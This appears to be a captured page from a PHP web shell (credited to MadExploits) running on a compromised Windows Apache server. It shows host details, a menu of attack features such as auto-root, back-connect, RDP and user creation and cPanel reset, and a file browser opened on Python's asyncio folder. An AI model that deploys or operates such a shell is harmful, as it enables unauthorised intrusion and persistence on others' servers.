Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
laragon /
bin /
python /
python-3.10 /
Lib /
asyncio /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxrwxrwx
__init__.py
1.12
KB
-rw-rw-rw-
__main__.py
3.39
KB
-rw-rw-rw-
base_events.py
73.99
KB
-rw-rw-rw-
base_futures.py
2.59
KB
-rw-rw-rw-
base_subprocess.py
8.91
KB
-rw-rw-rw-
base_tasks.py
2.49
KB
-rw-rw-rw-
constants.py
915
B
-rw-rw-rw-
coroutines.py
8.85
KB
-rw-rw-rw-
events.py
27.38
KB
-rw-rw-rw-
exceptions.py
1.65
KB
-rw-rw-rw-
format_helpers.py
2.42
KB
-rw-rw-rw-
futures.py
14.21
KB
-rw-rw-rw-
locks.py
13.93
KB
-rw-rw-rw-
log.py
131
B
-rw-rw-rw-
mixins.py
834
B
-rw-rw-rw-
proactor_events.py
32.45
KB
-rw-rw-rw-
protocols.py
7
KB
-rw-rw-rw-
queues.py
8.08
KB
-rw-rw-rw-
runners.py
2.13
KB
-rw-rw-rw-
selector_events.py
39.65
KB
-rw-rw-rw-
sslproto.py
27.54
KB
-rw-rw-rw-
staggered.py
6
KB
-rw-rw-rw-
streams.py
25.88
KB
-rw-rw-rw-
subprocess.py
7.45
KB
-rw-rw-rw-
tasks.py
32.28
KB
-rw-rw-rw-
threads.py
815
B
-rw-rw-rw-
transports.py
10.8
KB
-rw-rw-rw-
trsock.py
5.94
KB
-rw-rw-rw-
unix_events.py
51.82
KB
-rw-rw-rw-
windows_events.py
33.12
KB
-rw-rw-rw-
windows_utils.py
5.11
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : threads.py
"""High-level support for working with threads in asyncio""" import functools import contextvars from . import events __all__ = "to_thread", async def to_thread(func, /, *args, **kwargs): """Asynchronously run function *func* in a separate thread. Any *args and **kwargs supplied for this function are directly passed to *func*. Also, the current :class:`contextvars.Context` is propagated, allowing context variables from the main thread to be accessed in the separate thread. Return a coroutine that can be awaited to get the eventual result of *func*. """ loop = events.get_running_loop() ctx = contextvars.copy_context() func_call = functools.partial(ctx.run, func, *args, **kwargs) return await loop.run_in_executor(None, func_call)
Close